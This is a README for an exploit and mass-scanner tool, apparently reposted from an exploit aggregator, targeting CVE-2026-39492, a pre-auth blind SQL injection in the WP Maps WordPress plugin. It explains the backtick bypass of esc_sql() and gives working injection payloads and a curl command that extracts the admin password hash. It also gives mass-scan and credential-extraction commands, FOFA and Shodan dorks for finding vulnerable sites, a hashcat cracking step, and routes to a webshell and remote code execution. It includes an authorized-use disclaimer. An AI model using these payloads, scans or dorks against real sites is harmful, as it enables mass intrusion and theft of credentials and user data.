Share
## https://sploitus.com/exploit?id=C6267772-8D88-57ED-80ED-6E28C1C86040
CVE-2026-39492 โ WP Maps Blind SQL Injection Scanner
Pre-Auth Time-Based Blind SQLi via Backtick Bypass โ DB Extraction
---
## Overview
**CVE-2026-39492** is a critical-severity (CVSS 9.3) unauthenticated blind SQL injection vulnerability in the **WP Maps** plugin (wp-google-map-plugin) versions **โค 4.9.1**.
The `wpgmp_ajax_call` AJAX handler is registered via `wp_ajax_nopriv_` for unauthenticated access. The `location_id` parameter is passed through `FlipperCode_Model_Base::is_column()` โ a function that incorrectly treats **backtick-wrapped input** as a trusted SQL column identifier, completely bypassing WordPress's `esc_sql()` sanitization.
### Affected Versions
| WP Maps Version | Status |
|---|---|
| โค 4.9.1 | Vulnerable |
| โฅ 4.9.2 | Patched |
> **Active installs:** 100,000+
---
## Vulnerability Mechanism
### Root Cause
In the plugin's database abstraction layer, `is_column()` checks if user input is wrapped in backticks:
```php
// Vulnerable: backtick-wrapped input treated as trusted column identifier
function is_column($value) {
if (preg_match('/^`.*`$/', $value)) {
return true; // bypasses esc_sql() entirely!
}
return false;
}
```
When `is_column()` returns `true`, the input is passed directly to the SQL query without `esc_sql()` escaping. This allows:
```
location_id=`1` AND SLEEP(5) AND `1`=`1
```
### Attack Flow
```
1. Detect WP Maps via readme.txt โ extract version
2. POST to /wp-admin/admin-ajax.php?action=wpgmp_ajax_call
3. Inject backtick-wrapped payload in location_id parameter
4. Measure response time โ SLEEP(N) confirms SQL injection
5. Extract data via boolean/time-based blind technique
```
### Why CVSS 9.3
| Metric | Value |
|---|---|
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Scope | Changed (impacts entire DB) |
| Confidentiality | High |
| Integrity | None |
| Availability | Low |
---
## Installation
```bash
git clone https://github.com/shinthink/CVE-2026-39492.git
cd CVE-2026-39492
pip install -r requirements.txt
```
---
## Usage
```bash
# Single target detection
python cve_2026_39492.py -t target.com
# Mass scan
python cve_2026_39492.py -f targets.txt
# Mass scan + save results
python cve_2026_39492.py -f targets.txt -o sqli.txt
# Single target with credential extraction
python cve_2026_39492.py -t target.com --extract -v
# Verbose output
python cve_2026_39492.py -t target.com -v
```
### Arguments
```
-t, --target Single target (domain or IP)
-f, --file Target list, one per line
-o, --output Save vulnerable targets to file
--threads Concurrent workers (default: 20)
--extract Extract admin credentials from confirmed targets
-v, --verbose Show detailed output
```
---
## Proof of Concept
### Single Target
```bash
$ python cve_2026_39492.py -t target.com -v
```
```
CVE-2026-39492 โ WP Maps Blind SQL Injection Scanner
CVSS 9.3 | Pre-Auth | wpgmp_ajax_call โ Backtick Bypass
Target: WP Maps (wp-google-map-plugin) 5 seconds โ VULNERABLE
```
**Step 3 โ Extract admin hash via blind SQLi**
```bash
# Check first character of admin hash
time curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
-d 'action=wpgmp_ajax_call' \
-d 'location_id=`1` AND IF(ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1))=36,SLEEP(3),0) AND `1`=`1'
# Response > 3 seconds โ first char is ASCII 36 = '$'
```
**Step 4 โ Crack hash & login โ full RCE**
```bash
hashcat -m 400 -a 0 admin_hash.txt /usr/share/wordlists/rockyou.txt
```
---
## FOFA Dork
```
body="wp-google-map-plugin"
```
## Shodan
```
http.html:"wp-google-map-plugin"
```
---
## Impact
Successful exploitation allows extraction of the **entire WordPress database**:
- Admin password hashes โ crack โ admin login โ plugin upload โ RCE
- User PII, emails, session tokens
- API keys stored in wp_options
- If MySQL FILE privilege exists: `SELECT ... INTO OUTFILE` โ webshell โ direct RCE
---
## Disclaimer
> **FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.**
>
> This software is intended for security professionals conducting authorized penetration tests, organizations auditing their own infrastructure, and researchers studying vulnerability exploitation.
>
> Unauthorized access to computer systems is illegal and may violate:
> - United States: Computer Fraud and Abuse Act (18 U.S.C. 1030)
> - Indonesia: UU ITE Pasal 30 & 46
> - European Union: Directive 2013/40/EU
> - United Kingdom: Computer Misuse Act 1990
>
> The authors assume no liability for misuse.
---
## References
| Resource | Link |
|---|---|
| IONIX Advisory | [ionix.io/threat-center/cve-2026-39492](https://www.ionix.io/threat-center/cve-2026-39492/) |
| WPScan Advisory | [wpscan.com/vulnerability/c1f19d2e](https://wpscan.com/vulnerability/c1f19d2e-b28e-4962-951d-946b311fcd0b/) |
| Wordfence Advisory | [wordfence.com](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-google-map-plugin/wp-maps-store-locatorgoogle-mapsopenstreetmapmapboxlistingdirectory-filters-491-unauthenticated-sql-injection) |
| NVD Entry | [CVE-2026-39492](https://nvd.nist.gov/vuln/detail/CVE-2026-39492) |
| Plugin Trac | [wp-google-map-plugin](https://plugins.trac.wordpress.org/browser/wp-google-map-plugin/) |
---
This project is not affiliated with Flipper Code or WP Maps.